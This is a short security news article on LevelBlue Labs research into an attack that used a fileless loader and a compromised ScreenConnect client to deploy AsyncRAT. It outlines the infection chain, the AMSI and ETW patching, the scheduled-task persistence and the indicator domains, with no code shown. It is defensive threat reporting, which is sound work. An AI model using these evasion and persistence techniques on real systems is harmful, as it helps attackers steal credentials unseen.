LevelBlue Labs has published new research on a recent attack that used a fileless loader to deliver AsyncRAT, a well-known Remote Access Trojan used for credential theft and on compromised systems.
The investigation found that attackers gained initial access through a compromised ScreenConnect client, with SentinelOne detecting the process execution that revealed the malicious activity. The connection was routed through relay.shipperzone.online, a domain linked to unauthorised ScreenConnect deployments.
From there, a VBScript named Update.vbs was executed with WScript, which launched PowerShell commands to download two payloads, logs.ldk and logs.ldr, from an external server. These were placed in the public user directory and executed entirely in memory.
LevelBlue Labs’ technical analysis shared with Hackread.com showed the first stage was Obfuscator.dll, a .NET assembly used to launch malicious code, disable security controls, and set persistence. Its methods included patching AMSI and ETW to bypass Windows logging, dynamic API resolution to hinder static detection, and creation of a scheduled task disguised as “Skype Updater.”
The second stage, AsyncClient.exe, handled command-and-control activity. It decrypted its configuration using AES-256, which revealed its C2 server at 3osch20.duckdns.org along with infection flags and persistence settings. Communication with the server was maintained over a TCP socket using custom packet formats.
AsyncRAT’s capabilities in this case included reconnaissance of the infected machine, logging of keystrokes, collection of browser data and extensions, and continuous persistence through scheduled tasks. Sensitive data such as user credentials and clipboard contents could be exfiltrated back to the operator.
LevelBlue Labs reports that attackers are now using AsyncRAT with fileless methods that avoid traditional disk-based detection tools. The full report, including indicators of compromise and technical details, is available from LevelBlue Labs.
